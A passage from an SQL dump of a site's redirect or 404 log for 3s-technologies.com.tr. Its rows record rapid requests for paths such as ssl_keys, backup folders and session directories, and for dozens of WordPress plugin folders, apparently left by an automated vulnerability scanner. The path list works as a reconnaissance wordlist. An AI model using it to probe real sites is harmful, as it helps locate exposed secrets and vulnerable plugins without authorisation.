00:00:00',301),(65508,'http://3s-technologies.com.tr/en/backup_2025',NULL,'','',1,0,'2026-05-22 17:27:34','0000-00-00 00:00:00',301),(65509,'http://3s-technologies.com.tr/en/temp_files',NULL,'','',1,0,'2026-05-22 17:27:34','0000-00-00 00:00:00',301),(65510,'http://3s-technologies.com.tr/en/temporary',NULL,'','',1,0,'2026-05-22 17:27:35','0000-00-00 00:00:00',301),(65511,'http://3s-technologies.com.tr/en/tmp_files',NULL,'','',1,0,'2026-05-22 17:27:35','0000-00-00 00:00:00',301),(65512,'http://3s-technologies.com.tr/en/tmp_uploads',NULL,'','',1,0,'2026-05-22 17:27:36','0000-00-00 00:00:00',301),(65513,'http://3s-technologies.com.tr/en/cache_files',NULL,'','',1,0,'2026-05-22 17:27:36','0000-00-00 00:00:00',301),(65514,'http://3s-technologies.com.tr/en/cached',NULL,'','',1,0,'2026-05-22 17:27:37','0000-00-00 00:00:00',301),(65515,'http://3s-technologies.com.tr/en/compiled',NULL,'','',1,0,'2026-05-22 17:27:37','0000-00-00 00:00:00',301),(65516,'http://3s-technologies.com.tr/en/compressed',NULL,'','',1,0,'2026-05-22 17:27:38','0000-00-00 00:00:00',301),(65517,'http://3s-technologies.com.tr/en/ssl_certs',NULL,'','',1,0,'2026-05-22 17:27:39','0000-00-00 00:00:00',301),(65518,'http://3s-technologies.com.tr/en/ssl_certificates',NULL,'','',1,0,'2026-05-22 17:27:39','0000-00-00 00:00:00',301),(65519,'http://3s-technologies.com.tr/en/ssl_keys',NULL,'','',1,0,'2026-05-22 17:27:40','0000-00-00 00:00:00',301),(65520,'http://3s-technologies.com.tr/en/ssl_crt',NULL,'','',1,0,'2026-05-22 17:27:40','0000-00-00 00:00:00',301),(65521,'http://3s-technologies.com.tr/en/letsencrypt',NULL,'','',1,0,'2026-05-22 17:27:41','0000-00-00 00:00:00',301),(65522,'http://3s-technologies.com.tr/en/acme',NULL,'','',1,0,'2026-05-22 17:27:41','0000-00-00 00:00:00',301),(65523,'http://3s-technologies.com.tr/en/certbot',NULL,'','',1,0,'2026-05-22 17:27:42','0000-00-00 00:00:00',301),(65524,'http://3s-technologies.com.tr/en/ssl-pinning',NULL,'','',1,0,'2026-05-22 17:27:42','0000-00-00 00:00:00',301),(65525,'http://3s-technologies.com.tr/en/security',NULL,'','',1,0,'2026-05-22 17:27:42','0000-00-00 00:00:00',301),(65526,'http://3s-technologies.com.tr/en/firewall',NULL,'','',1,0,'2026-05-22 17:27:43','0000-00-00 00:00:00',301),(65527,'http://3s-technologies.com.tr/en/waf',NULL,'','',1,0,'2026-05-22 17:27:43','0000-00-00 00:00:00',301),(65528,'http://3s-technologies.com.tr/en/modsecurity',NULL,'','',1,0,'2026-05-22 17:27:44','0000-00-00 00:00:00',301),(65529,'http://3s-technologies.com.tr/en/var/run',NULL,'','',1,0,'2026-05-22 17:27:44','0000-00-00 00:00:00',301),(65530,'http://3s-technologies.com.tr/en/var/pid',NULL,'','',1,0,'2026-05-22 17:27:45','0000-00-00 00:00:00',301),(65531,'http://3s-technologies.com.tr/en/var/lock',NULL,'','',1,0,'2026-05-22 17:27:46','0000-00-00 00:00:00',301),(65532,'http://3s-technologies.com.tr/en/var/tmp',NULL,'','',1,0,'2026-05-22 17:27:46','0000-00-00 00:00:00',301),(65533,'http://3s-technologies.com.tr/en/tmp/sessions',NULL,'','',1,0,'2026-05-22 17:27:47','0000-00-00 00:00:00',301),(65534,'http://3s-technologies.com.tr/en/tmp/uploads',NULL,'','',1,0,'2026-05-22 17:27:47','0000-00-00 00:00:00',301),(65535,'http://3s-technologies.com.tr/en/tmp/cache',NULL,'','',1,0,'2026-05-22 17:27:48','0000-00-00 00:00:00',301),(65536,'http://3s-technologies.com.tr/en/runtime',NULL,'','',1,0,'2026-05-22 17:27:48','0000-00-00 00:00:00',301),(65537,'http://3s-technologies.com.tr/en/runtime/cache',NULL,'','',1,0,'2026-05-22 17:27:49','0000-00-00 00:00:00',301),(65538,'http://3s-technologies.com.tr/en/runtime/logs',NULL,'','',1,0,'2026-05-22 17:27:49','0000-00-00 00:00:00',301),(65539,'http://3s-technologies.com.tr/en/runtime/sessions',NULL,'','',1,0,'2026-05-22 17:27:50','0000-00-00 00:00:00',301),(65540,'http://3s-technologies.com.tr/en/data',NULL,'','',1,0,'2026-05-22 17:27:51','0000-00-00 00:00:00',301),(65541,'http://3s-technologies.com.tr/en/datasets',NULL,'','',1,0,'2026-05-22 17:27:52','0000-00-00 00:00:00',301),(65542,'http://3s-technologies.com.tr/en/dataset',NULL,'','',1,0,'2026-05-22 17:27:53','0000-00-00 00:00:00',301),(65543,'http://3s-technologies.com.tr/en/data-science',NULL,'','',1,0,'2026-05-22 17:27:53','0000-00-00 00:00:00',301),(65544,'http://3s-technologies.com.tr/en/ml-models',NULL,'','',1,0,'2026-05-22 17:27:54','0000-00-00 00:00:00',301),(65545,'http://3s-technologies.com.tr/en/trained-models',NULL,'','',1,0,'2026-05-22 17:27:55','0000-00-00 00:00:00',301),(65546,'http://3s-technologies.com.tr/en/weights',NULL,'','',1,0,'2026-05-22 17:27:56','0000-00-00 00:00:00',301),(65547,'http://3s-technologies.com.tr/en/notebooks',NULL,'','',1,0,'2026-05-22 17:27:56','0000-00-00 00:00:00',301),(65548,'http://3s-technologies.com.tr/en/jupyter',NULL,'','',1,0,'2026-05-22 17:27:57','0000-00-00 00:00:00',301),(65549,'http://3s-technologies.com.tr/en/colab',NULL,'','',1,0,'2026-05-22 17:27:57','0000-00-00 00:00:00',301),(65550,'http://3s-technologies.com.tr/en/datastudio',NULL,'','',1,0,'2026-05-22 17:27:58','0000-00-00 00:00:00',301),(65551,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce',NULL,'','',1,0,'2026-05-22 17:28:06','0000-00-00 00:00:00',301),(65552,'http://3s-technologies.com.tr/en/wp-content/plugins/wordfence',NULL,'','',1,0,'2026-05-22 17:28:07','0000-00-00 00:00:00',301),(65553,'http://3s-technologies.com.tr/en/wp-content/plugins/jetpack',NULL,'','',1,0,'2026-05-22 17:28:08','0000-00-00 00:00:00',301),(65554,'http://3s-technologies.com.tr/en/wp-content/plugins/elementor',NULL,'','',1,0,'2026-05-22 17:28:08','0000-00-00 00:00:00',301),(65555,'http://3s-technologies.com.tr/en/wp-content/plugins/yoast-seo',NULL,'','',1,0,'2026-05-22 17:28:09','0000-00-00 00:00:00',301),(65556,'http://3s-technologies.com.tr/en/wp-content/plugins/contact-form-7',NULL,'','',1,0,'2026-05-22 17:28:10','0000-00-00 00:00:00',301),(65557,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-rocket',NULL,'','',1,0,'2026-05-22 17:28:11','0000-00-00 00:00:00',301),(65558,'http://3s-technologies.com.tr/en/wp-content/plugins/w3-total-cache',NULL,'','',1,0,'2026-05-22 17:28:11','0000-00-00 00:00:00',301),(65559,'http://3s-technologies.com.tr/en/wp-content/plugins/litespeed-cache',NULL,'','',1,0,'2026-05-22 17:28:12','0000-00-00 00:00:00',301),(65560,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-super-cache',NULL,'','',1,0,'2026-05-22 17:28:12','0000-00-00 00:00:00',301),(65561,'http://3s-technologies.com.tr/en/wp-content/plugins/autoptimize',NULL,'','',1,0,'2026-05-22 17:28:13','0000-00-00 00:00:00',301),(65562,'http://3s-technologies.com.tr/en/wp-content/plugins/duplicate-post',NULL,'','',1,0,'2026-05-22 17:28:13','0000-00-00 00:00:00',301),(65563,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress-seo',NULL,'','',1,0,'2026-05-22 17:28:14','0000-00-00 00:00:00',301),(65564,'http://3s-technologies.com.tr/en/wp-content/plugins/rank-math',NULL,'','',1,0,'2026-05-22 17:28:15','0000-00-00 00:00:00',301),(65565,'http://3s-technologies.com.tr/en/wp-content/plugins/redirection',NULL,'','',1,0,'2026-05-22 17:28:15','0000-00-00 00:00:00',301),(65566,'http://3s-technologies.com.tr/en/wp-content/plugins/updraftplus',NULL,'','',1,0,'2026-05-22 17:28:16','0000-00-00 00:00:00',301),(65567,'http://3s-technologies.com.tr/en/wp-content/plugins/bakery-builder',NULL,'','',1,0,'2026-05-22 17:28:16','0000-00-00 00:00:00',301),(65568,'http://3s-technologies.com.tr/en/wp-content/plugins/visual-composer',NULL,'','',1,0,'2026-05-22 17:28:17','0000-00-00 00:00:00',301),(65569,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider',NULL,'','',1,0,'2026-05-22 17:28:17','0000-00-00 00:00:00',301),(65570,'http://3s-technologies.com.tr/en/wp-content/plugins/layer-slider',NULL,'','',1,0,'2026-05-22 17:28:18','0000-00-00 00:00:00',301),(65571,'http://3s-technologies.com.tr/en/wp-content/plugins/wpforms',NULL,'','',1,0,'2026-05-22 17:28:19','0000-00-00 00:00:00',301),(65572,'http://3s-technologies.com.tr/en/wp-content/plugins/caldera-forms',NULL,'','',1,0,'2026-05-22 17:28:21','0000-00-00 00:00:00',301),(65573,'http://3s-technologies.com.tr/en/wp-content/plugins/polylang',NULL,'','',1,0,'2026-05-22 17:28:22','0000-00-00 00:00:00',301),(65574,'http://3s-technologies.com.tr/en/wp-content/plugins/wpml',NULL,'','',1,0,'2026-05-22 17:28:23','0000-00-00 00:00:00',301),(65575,'http://3s-technologies.com.tr/en/wp-content/plugins/translatepress',NULL,'','',1,0,'2026-05-22 17:28:24','0000-00-00 00:00:00',301),(65576,'http://3s-technologies.com.tr/en/wp-content/plugins/advanced-custom-fields',NULL,'','',1,0,'2026-05-22 17:28:25','0000-00-00 00:00:00',301),(65577,'http://3s-technologies.com.tr/en/wp-content/plugins/meta-box',NULL,'','',1,0,'2026-05-22 17:28:25','0000-00-00 00:00:00',301),(65578,'http://3s-technologies.com.tr/en/wp-content/plugins/carbon-fields',NULL,'','',1,0,'2026-05-22 17:28:26','0000-00-00 00:00:00',301),(65579,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-gateway-stripe',NULL,'','',1,0,'2026-05-22 17:28:26','0000-00-00 00:00:00',301),(65580,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-payments',NULL,'','',1,0,'2026-05-22 17:28:27','0000-00-00 00:00:00',301),(65581,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-subscriptions',NULL,'','',1,0,'2026-05-22 17:28:27','0000-00-00 00:00:00',301),(65582,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-memberships',NULL,'','',1,0,'2026-05-22 17:28:28','0000-00-00 00:00:00',301),(65583,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-bookings',NULL,'','',1,0,'2026-05-22 17:28:28','0000-00-00 00:00:00',301),(65584,'http://3s-technologies.com.tr/en/wp-content/plugins/woocommerce-product-addons',NULL,'','',1,0,'2026-05-22 17:28:29','0000-00-00 00:00:00',301),(65585,'http://3s-technologies.com.tr/en/wp-content/plugins/the-events-calendar',NULL,'','',1,0,'2026-05-22 17:28:29','0000-00-00 00:00:00',301),(65586,'http://3s-technologies.com.tr/en/wp-content/plugins/events-manager',NULL,'','',1,0,'2026-05-22 17:28:30','0000-00-00 00:00:00',301),(65587,'http://3s-technologies.com.tr/en/wp-content/plugins/learnpress',NULL,'','',1,0,'2026-05-22 17:28:30','0000-00-00 00:00:00',301),(65588,'http://3s-technologies.com.tr/en/wp-content/plugins/tutor-lms',NULL,'','',1,0,'2026-05-22 17:28:31','0000-00-00 00:00:00',301),(65589,'http://3s-technologies.com.tr/en/wp-content/plugins/buddypress',NULL,'','',1,0,'2026-05-22 17:28:31','0000-00-00 00:00:00',301),(65590,'http://3s-technologies.com.tr/en/wp-content/plugins/bbpress',NULL,'','',1,0,'2026-05-22 17:28:32','0000-00-00 00:00:00',301),(65591,'http://3s-technologies.com.tr/en/wp-content/plugins/ultimate-member',NULL,'','',1,0,'2026-05-22 17:28:32','0000-00-00 00:00:00',301),(65592,'http://3s-technologies.com.tr/en/wp-content/plugins/memberpress',NULL,'','',1,0,'2026-05-22 17:28:33','0000-00-00 00:00:00',301),(65593,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-members',NULL,'','',1,0,'2026-05-22 17:28:33','0000-00-00 00:00:00',301),(65594,'http://3s-technologies.com.tr/en/wp-content/plugins/simple-membership',NULL,'','',1,0,'2026-05-22 17:28:34','0000-00-00 00:00:00',301),(65595,'http://3s-technologies.com.tr/en/wp-content/plugins/all-in-one-seo-pack',NULL,'','',1,0,'2026-05-22 17:28:34','0000-00-00 00:00:00',301),(65596,'http://3s-technologies.com.tr/en/wp-content/plugins/seo-framework',NULL,'','',1,0,'2026-05-22 17:28:35','0000-00-00 00:00:00',301),(65597,'http://3s-technologies.com.tr/en/wp-content/plugins/google-site-kit',NULL,'','',1,0,'2026-05-22 17:28:35','0000-00-00 00:00:00',301),(65598,'http://3s-technologies.com.tr/en/wp-content/plugins/monsterinsights',NULL,'','',1,0,'2026-05-22 17:28:36','0000-00-00 00:00:00',301),(65599,'http://3s-technologies.com.tr/en/wp-content/plugins/google-analytics-for-wordpress',NULL,'','',1,0,'2026-05-22 17:28:36','0000-00-00 00:00:00',301),(65600,'http://3s-technologies.com.tr/en/wp-content/plugins/exactmetrics',NULL,'','',1,0,'2026-05-22 17:28:37','0000-00-00 00:00:00',301),(65601,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-optimize',NULL,'','',1,0,'2026-05-22 17:28:37','0000-00-00 00:00:00',301),(65602,'http://3s-technologies.com.tr/en/wp-content/plugins/asset-cleanup',NULL,'','',1,0,'2026-05-22 17:28:38','0000-00-00 00:00:00',301),(65603,'http://3s-technologies.com.tr/en/wp-content/plugins/sg-cachepress',NULL,'','',1,0,'2026-05-22 17:28:38','0000-00-00 00:00:00',301),(65604,'http://3s-technologies.com.tr/en/wp-content/plugins/cache-enabler',NULL,'','',1,0,'2026-05-22 17:28:39','0000-00-00 00:00:00',301),(65605,'http://3s-technologies.com.tr/en/wp-content/plugins/hummingbird',NULL,'','',1,0,'2026-05-22 17:28:39','0000-00-00 00:00:00',301),(65606,'http://3s-technologies.com.tr/en/wp-content/plugins/swift-performance',NULL,'','',1,0,'2026-05-22 17:28:40','0000-00-00 00:00:00',301),(65607,'http://3s-technologies.com.tr/en/wp-content/plugins/imagify',NULL,'','',1,0,'2026-05-22 17:28:40','0000-00-00 00:00:00',301),(65608,'http://3s-technologies.com.tr/en/wp-content/plugins/shortpixel',NULL,'','',1,0,'2026-05-22 17:28:41','0000-00-00 00:00:00',301),(65609,'http://3s-technologies.com.tr/en/wp-content/plugins/ewww-image-optimizer',NULL,'','',1,0,'2026-05-22 17:28:41','0000-00-00 00:00:00',301),(65610,'http://3s-technologies.com.tr/en/wp-content/plugins/smush',NULL,'','',1,0,'2026-05-22 17:28:41','0000-00-00 00:00:00',301),(65611,'http://3s-technologies.com.tr/en/wp-content/plugins/regenerate-thumbnails',NULL,'','',1,0,'2026-05-22 17:28:42','0000-00-00 00:00:00',301),(65612,'http://3s-technologies.com.tr/en/wp-content/plugins/enable-media-replace',NULL,'','',1,0,'2026-05-22 17:28:42','0000-00-00 00:00:00',301),(65613,'http://3s-technologies.com.tr/en/wp-content/plugins/maintenance',NULL,'','',1,0,'2026-05-22 17:28:43','0000-00-00 00:00:00',301),(65614,'http://3s-technologies.com.tr/en/wp-content/plugins/under-construction',NULL,'','',1,0,'2026-05-22 17:28:43','0000-00-00 00:00:00',301),(65615,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-maintenance-mode',NULL,'','',1,0,'2026-05-22 17:28:44','0000-00-00 00:00:00',301),(65616,'http://3s-technologies.com.tr/en/wp-content/plugins/seedprod',NULL,'','',1,0,'2026-05-22 17:28:44','0000-00-00 00:00:00',301),(65617,'http://3s-technologies.com.tr/en/wp-content/plugins/coming-soon',NULL,'','',1,0,'2026-05-22 17:28:45','0000-00-00 00:00:00',301),(65618,'http://3s-technologies.com.tr/en/wp-content/plugins/header-footer-elementor',NULL,'','',1,0,'2026-05-22 17:28:45','0000-00-00 00:00:00',301),(65619,'http://3s-technologies.com.tr/en/wp-content/plugins/essential-addons',NULL,'','',1,0,'2026-05-22 17:28:46','0000-00-00 00:00:00',301),(65620,'http://3s-technologies.com.tr/en/wp-content/plugins/ele-custom-skin',NULL,'','',1,0,'2026-05-22 17:28:46','0000-00-00 00:00:00',301),(65621,'http://3s-technologies.com.tr/en/wp-content/plugins/royal-elementor-addons',NULL,'','',1,0,'2026-05-22 17:28:46','0000-00-00 00:00:00',301),(65622,'http://3s-technologies.com.tr/en/wp-content/plugins/happy-elementor-addons',NULL,'','',1,0,'2026-05-22 17:28:47','0000-00-00 00:00:00',301),(65623,'http://3s-technologies.com.tr/en/wp-content/plugins/beaver-builder-lite-version',NULL,'','',1,0,'2026-05-22 17:28:47','0000-00-00 00:00:00',301),(65624,'http://3s-technologies.com.tr/en/wp-content/plugins/divi-builder',NULL,'','',1,0,'2026-05-22 17:28:47','0000-00-00 00:00:00',301),(65625,'http://3s-technologies.com.tr/en/wp-content/plugins/oxygen',NULL,'','',1,0,'2026-05-22 17:28:48','0000-00-00 00:00:00',301),(65626,'http://3s-technologies.com.tr/en/wp-content/plugins/breakdance',NULL,'','',1,0,'2026-05-22 17:28:48','0000-00-00 00:00:00',301),(65627,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager',NULL,'','',1,0,'2026-05-22 17:28:49','0000-00-00 00:00:00',301),(65628,'http://3s-technologies.com.tr/en/wp-content/plugins/file-manager-advanced',NULL,'','',1,0,'2026-05-22 17:28:49','0000-00-00 00:00:00',301),(65629,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-media-folder',NULL,'','',1,0,'2026-05-22 17:28:50','0000-00-00 00:00:00',301),(65630,'http://3s-technologies.com.tr/en/wp-content/plugins/real-media-library',NULL,'','',1,0,'2026-05-22 17:28:50','0000-00-00 00:00:00',301),(65631,'http://3s-technologies.com.tr/en/wp-content/plugins/nextgen-gallery',NULL,'','',1,0,'2026-05-22 17:28:51','0000-00-00 00:00:00',301),(65632,'http://3s-technologies.com.tr/en/wp-content/plugins/envira-gallery',NULL,'','',1,0,'2026-05-22 17:28:51','0000-00-00 00:00:00',301),(65633,'http://3s-technologies.com.tr/en/wp-content/plugins/foobox-image-lightbox',NULL,'','',1,0,'2026-05-22 17:28:51','0000-00-00 00:00:00',301),(65634,'http://3s-technologies.com.tr/en/wp-content/plugins/responsive-lightbox',NULL,'','',1,0,'2026-05-22 17:28:52','0000-00-00 00:00:00',301),(65635,'http://3s-technologies.com.tr/en/wp-content/plugins/mailpoet',NULL,'','',1,0,'2026-05-22 17:28:52','0000-00-00 00:00:00',301),(65636,'http://3s-technologies.com.tr/en/wp-content/plugins/newsletter',NULL,'','',1,0,'2026-05-22 17:28:53','0000-00-00 00:00:00',301),(65637,'http://3s-technologies.com.tr/en/wp-content/plugins/mailchimp-for-wp',NULL,'','',1,0,'2026-05-22 17:28:53','0000-00-00 00:00:00',301),(65638,'http://3s-technologies.com.tr/en/wp-content/plugins/optinmonster',NULL,'','',1,0,'2026-05-22 17:28:54','0000-00-00 00:00:00',301),(65639,'http://3s-technologies.com.tr/en/wp-content/plugins/convertplug',NULL,'','',1,0,'2026-05-22 17:28:54','0000-00-00 00:00:00',301),(65640,'http://3s-technologies.com.tr/en/wp-content/plugins/leadin',NULL,'','',1,0,'2026-05-22 17:28:55','0000-00-00 00:00:00',301),(65641,'http://3s-technologies.com.tr/en/wp-content/plugins/hubspot',NULL,'','',1,0,'2026-05-22 17:28:55','0000-00-00 00:00:00',301),(65642,'http://3s-technologies.com.tr/en/wp-content/plugins/fluentform',NULL,'','',1,0,'2026-05-22 17:28:56','0000-00-00 00:00:00',301),(65643,'http://3s-technologies.com.tr/en/wp-content/plugins/forminator',NULL,'','',1,0,'2026-05-22 17:28:56','0000-00-00 00:00:00',301),(65644,'http://3s-technologies.com.tr/en/wp-content/plugins/wpcf7-redirect',NULL,'','',1,0,'2026-05-22 17:28:56','0000-00-00 00:00:00',301),(65645,'http://3s-technologies.com.tr/en/wp-content/plugins/really-simple-ssl',NULL,'','',1,0,'2026-05-22 17:28:57','0000-00-00 00:00:00',301),(65646,'http://3s-technologies.com.tr/en/wp-content/plugins/ssl-insecure-content-fixer',NULL,'','',1,0,'2026-05-22 17:28:57','0000-00-00 00:00:00',301),(65647,'http://3s-technologies.com.tr/en/wp-content/plugins/better-wp-security',NULL,'','',1,0,'2026-05-22 17:28:58','0000-00-00 00:00:00',301),(65648,'http://3s-technologies.com.tr/en/wp-content/plugins/all-in-one-wp-security',NULL,'','',1,0,'2026-05-22 17:28:58','0000-00-00 00:00:00',301),(65649,'http://3s-technologies.com.tr/en/wp-content/plugins/anti-spam',NULL,'','',1,0,'2026-05-22 17:28:59','0000-00-00 00:00:00',301),(65650,'http://3s-technologies.com.tr/en/wp-content/plugins/stop-spammer-registrations-plugin',NULL,'','',1,0,'2026-05-22 17:28:59','0000-00-00 00:00:00',301),(65651,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-spamshield',NULL,'','',1,0,'2026-05-22 17:29:00','0000-00-00 00:00:00',301),(65652,'http://3s-technologies.com.tr/en/wp-content/plugins/cleantalk-spam-protect',NULL,'','',1,0,'2026-05-22 17:29:01','0000-00-00 00:00:00',301),(65653,'http://3s-technologies.com.tr/en/wp-content/plugins/sucuri-scanner',NULL,'','',1,0,'2026-05-22 17:29:01','0000-00-00 00:00:00',301),(65654,'http://3s-technologies.com.tr/en/wp-content/plugins/defender-security',NULL,'','',1,0,'2026-05-22 17:29:02','0000-00-00 00:00:00',301),(65655,'http://3s-technologies.com.tr/en/wp-content/plugins/backupbuddy',NULL,'','',1,0,'2026-05-22 17:29:02','0000-00-00 00:00:00',301),(65656,'http://3s-technologies.com.tr/en/wp-content/plugins/backwpup',NULL,'','',1,0,'2026-05-22 17:29:02','0000-00-00 00:00:00',301),(65657,'http://3s-technologies.com.tr/en/wp-content/plugins/wpvivid-backuprestore',NULL,'','',1,0,'2026-05-22 17:29:03','0000-00-00 00:00:00',301),(65658,'http://3s-technologies.com.tr/en/wp-content/plugins/dropbox-backup',NULL,'','',1,0,'2026-05-22 17:29:03','0000-00-00 00:00:00',301),(65659,'http://3s-technologies.com.tr/en/wp-content/plugins/blogvault',NULL,'','',1,0,'2026-05-22 17:29:04','0000-00-00 00:00:00',301),(65660,'http://3s-technologies.com.tr/en/wp-content/plugins/jetpack-backup',NULL,'','',1,0,'2026-05-22 17:29:04','0000-00-00 00:00:00',301),(65661,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-sweep',NULL,'','',1,0,'2026-05-22 17:29:05','0000-00-00 00:00:00',301),(65662,'http://3s-technologies.com.tr/en/wp-content/plugins/advanced-database-cleaner',NULL,'','',1,0,'2026-05-22 17:29:05','0000-00-00 00:00:00',301),(65663,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-crontrol',NULL,'','',1,0,'2026-05-22 17:29:06','0000-00-00 00:00:00',301),(65664,'http://3s-technologies.com.tr/en/wp-content/plugins/query-monitor',NULL,'','',1,0,'2026-05-22 17:29:06','0000-00-00 00:00:00',301),(65665,'http://3s-technologies.com.tr/en/wp-content/plugins/debug-bar',NULL,'','',1,0,'2026-05-22 17:29:07','0000-00-00 00:00:00',301),(65666,'http://3s-technologies.com.tr/en/wp-content/plugins/health-check',NULL,'','',1,0,'2026-05-22 17:29:07','0000-00-00 00:00:00',301),(65667,'http://3s-technologies.com.tr/en/wp-content/plugins/user-role-editor',NULL,'','',1,0,'2026-05-22 17:29:07','0000-00-00 00:00:00',301),(65668,'http://3s-technologies.com.tr/en/wp-content/plugins/members',NULL,'','',1,0,'2026-05-22 17:29:08','0000-00-00 00:00:00',301),(65669,'http://3s-technologies.com.tr/en/wp-content/plugins/admin-menu-editor',NULL,'','',1,0,'2026-05-22 17:29:08','0000-00-00 00:00:00',301),(65670,'http://3s-technologies.com.tr/en/wp-content/plugins/custom-post-type-ui',NULL,'','',1,0,'2026-05-22 17:29:09','0000-00-00 00:00:00',301),(65671,'http://3s-technologies.com.tr/en/wp-content/plugins/pods',NULL,'','',1,0,'2026-05-22 17:29:09','0000-00-00 00:00:00',301),(65672,'http://3s-technologies.com.tr/en/wp-content/plugins/toolset-types',NULL,'','',1,0,'2026-05-22 17:29:10','0000-00-00 00:00:00',301),(65673,'http://3s-technologies.com.tr/en/wp-content/plugins/acf-content-analysis-for-yoast-seo',NULL,'','',1,0,'2026-05-22 17:29:10','0000-00-00 00:00:00',301),(65674,'http://3s-technologies.com.tr/en/wp-content/plugins/acf-quickedit-fields',NULL,'','',1,0,'2026-05-22 17:29:11','0000-00-00 00:00:00',301),(65675,'http://3s-technologies.com.tr/en/wp-content/plugins/facetwp',NULL,'','',1,0,'2026-05-22 17:29:11','0000-00-00 00:00:00',301),(65676,'http://3s-technologies.com.tr/en/wp-content/plugins/searchwp',NULL,'','',1,0,'2026-05-22 17:29:12','0000-00-00 00:00:00',301),(65677,'http://3s-technologies.com.tr/en/wp-content/plugins/relevanssi',NULL,'','',1,0,'2026-05-22 17:29:12','0000-00-00 00:00:00',301),(65678,'http://3s-technologies.com.tr/en/wp-content/plugins/better-search',NULL,'','',1,0,'2026-05-22 17:29:13','0000-00-00 00:00:00',301),(65679,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-google-maps',NULL,'','',1,0,'2026-05-22 17:29:13','0000-00-00 00:00:00',301),(65680,'http://3s-technologies.com.tr/en/wp-content/plugins/maps-marker-pro',NULL,'','',1,0,'2026-05-22 17:29:14','0000-00-00 00:00:00',301),(65681,'http://3s-technologies.com.tr/en/wp-content/plugins/leaflet-maps-marker',NULL,'','',1,0,'2026-05-22 17:29:15','0000-00-00 00:00:00',301),(65682,'http://3s-technologies.com.tr/en/wp-content/plugins/location-weather',NULL,'','',1,0,'2026-05-22 17:29:15','0000-00-00 00:00:00',301),(65683,'http://3s-technologies.com.tr/en/wp-content/plugins/bookly',NULL,'','',1,0,'2026-05-22 17:29:16','0000-00-00 00:00:00',301),(65684,'http://3s-technologies.com.tr/en/wp-content/plugins/booking-calendar',NULL,'','',1,0,'2026-05-22 17:29:16','0000-00-00 00:00:00',301),(65685,'http://3s-technologies.com.tr/en/wp-content/plugins/appointment-hour-booking',NULL,'','',1,0,'2026-05-22 17:29:17','0000-00-00 00:00:00',301),(65686,'http://3s-technologies.com.tr/en/wp-content/plugins/ameliabooking',NULL,'','',1,0,'2026-05-22 17:29:17','0000-00-00 00:00:00',301),(65687,'http://3s-technologies.com.tr/en/wp-content/plugins/restaurant-reservations',NULL,'','',1,0,'2026-05-22 17:29:18','0000-00-00 00:00:00',301),(65688,'http://3s-technologies.com.tr/en/wp-content/plugins/restropress',NULL,'','',1,0,'2026-05-22 17:29:18','0000-00-00 00:00:00',301),(65689,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-ecommerce',NULL,'','',1,0,'2026-05-22 17:29:19','0000-00-00 00:00:00',301),(65690,'http://3s-technologies.com.tr/en/wp-content/plugins/easy-digital-downloads',NULL,'','',1,0,'2026-05-22 17:29:19','0000-00-00 00:00:00',301),(65691,'http://3s-technologies.com.tr/en/wp-content/plugins/affiliate-wp',NULL,'','',1,0,'2026-05-22 17:29:20','0000-00-00 00:00:00',301),(65692,'http://3s-technologies.com.tr/en/wp-content/plugins/amazon-associates-link-builder',NULL,'','',1,0,'2026-05-22 17:29:20','0000-00-00 00:00:00',301),(65693,'http://3s-technologies.com.tr/en/wp-content/plugins/ad-inserter',NULL,'','',1,0,'2026-05-22 17:29:21','0000-00-00 00:00:00',301),(65694,'http://3s-technologies.com.tr/en/wp-content/plugins/advanced-ads',NULL,'','',1,0,'2026-05-22 17:29:21','0000-00-00 00:00:00',301),(65695,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-auto-affiliate-links',NULL,'','',1,0,'2026-05-22 17:29:22','0000-00-00 00:00:00',301),(65696,'http://3s-technologies.com.tr/en/wp-content/plugins/thirstyaffiliates',NULL,'','',1,0,'2026-05-22 17:29:22','0000-00-00 00:00:00',301),(65697,'http://3s-technologies.com.tr/en/wp-content/plugins/pretty-link',NULL,'','',1,0,'2026-05-22 17:29:23','0000-00-00 00:00:00',301),(65698,'http://3s-technologies.com.tr/en/wp-content/plugins/simple-urls',NULL,'','',1,0,'2026-05-22 17:29:24','0000-00-00 00:00:00',301),(65699,'http://3s-technologies.com.tr/en/wp-content/plugins/popup-maker',NULL,'','',1,0,'2026-05-22 17:29:24','0000-00-00 00:00:00',301),(65700,'http://3s-technologies.com.tr/en/wp-content/plugins/popups',NULL,'','',1,0,'2026-05-22 17:29:24','0000-00-00 00:00:00',301),(65701,'http://3s-technologies.com.tr/en/wp-content/plugins/modal-window',NULL,'','',1,0,'2026-05-22 17:29:25','0000-00-00 00:00:00',301),(65702,'http://3s-technologies.com.tr/en/wp-content/plugins/easy-fancybox',NULL,'','',1,0,'2026-05-22 17:29:26','0000-00-00 00:00:00',301),(65703,'http://3s-technologies.com.tr/en/wp-content/plugins/slider-revolution',NULL,'','',1,0,'2026-05-22 17:29:26','0000-00-00 00:00:00',301),(65704,'http://3s-technologies.com.tr/en/wp-content/plugins/smart-slider-3',NULL,'','',1,0,'2026-05-22 17:29:27','0000-00-00 00:00:00',301),(65705,'http://3s-technologies.com.tr/en/wp-content/plugins/meta-slider',NULL,'','',1,0,'2026-05-22 17:29:27','0000-00-00 00:00:00',301),(65706,'http://3s-technologies.com.tr/en/wp-content/plugins/royal-slider',NULL,'','',1,0,'2026-05-22 17:29:28','0000-00-00 00:00:00',301),(65707,'http://3s-technologies.com.tr/en/wp-content/plugins/instagram-feed',NULL,'','',1,0,'2026-05-22 17:29:28','0000-00-00 